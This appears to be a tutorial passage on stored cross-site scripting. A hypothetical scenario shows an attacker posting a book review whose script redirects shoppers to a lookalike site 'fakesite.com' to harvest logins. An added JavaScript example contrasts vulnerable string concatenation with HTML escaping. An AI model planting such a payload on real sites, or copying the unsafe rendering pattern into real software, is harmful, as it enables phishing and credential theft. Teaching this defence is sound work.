This attack is closely related to SQL injection. It involves entering data other than what was intended, and it depends on the web programmer not filtering input. The perpetrator finds some area of a website that allows users to type in text that other users will see, and then injects client-side script into those fields instead of ordinary text.
https://blog.perimeterx.com/joomla-cve-2015-7297/
Note
Before I describe this particular crime, I would point out that the major online retailers such as eBay and Amazon.com are not susceptible to this attack; they do filter user input.
To better understand this process, let’s look at a hypothetical scenario. Let’s assume that ABC online book sales has a website. In addition to shopping, users can have accounts with credit cards stored, post reviews, and more. The attacker first sets up an alternate web page that looks as close to the real one as possible. Then the attacker goes to the real ABC online book sales website and finds a rather popular book. He goes to the review section, but instead of typing in a review he types in this:
<script> window.location = "http://www.fakesite.com"; </script>
Now when users go to that book, this script will redirect them to the fake site, which looks a great deal like the real one. The attacker then can have the website tell the user that his session has timed out and to please log in again. That would allow the attacker to gather a lot of accounts and passwords. That is only one scenario, but it illustrates the attack.
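The scenario above works only if the review text is written into the page as markup. The following added example (not code from the original page) renders the same reviews twice, once by plain concatenation and once with output encoding, so the difference is visible. The function names and the sample reviews are constructed for illustration.

```javascript
// Added example: rendering user reviews for the hypothetical ABC book page.
// escapeHtml, renderReviewsUnsafe, renderReviewsSafe and containsScriptTag
// are illustrative names, not part of any real library.

// Constructed sample data: one ordinary review and the script quoted in the text.
const reviews = [
  { user: "alice", text: "Great read, arrived quickly & well packed." },
  { user: "mallory", text: '<script> window.location = "http://www.fakesite.com"; </script>' },
];

// Encode the five characters that let text break out of HTML content
// or out of a quoted attribute value.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: review text is concatenated into the page, so the browser
// parses the stored <script> element and runs it for every visitor.
function renderReviewsUnsafe(items) {
  return items.map((r) => `<li><b>${r.user}</b>: ${r.text}</li>`).join("\n");
}

// Hardened: every user-controlled field is encoded at output time, so the
// same stored text is displayed as characters instead of being executed.
function renderReviewsSafe(items) {
  return items
    .map((r) => `<li><b>${escapeHtml(r.user)}</b>: ${escapeHtml(r.text)}</li>`)
    .join("\n");
}

// Regression check a test suite could run against rendered output.
function containsScriptTag(html) {
  return /<\s*script\b/i.test(html);
}

console.log("unsafe:\n" + renderReviewsUnsafe(reviews));
console.log("safe:\n" + renderReviewsSafe(reviews));
```

Encoding at output time covers text placed in HTML content and quoted attributes; values written into JavaScript, CSS or URLs need the encoder for that context.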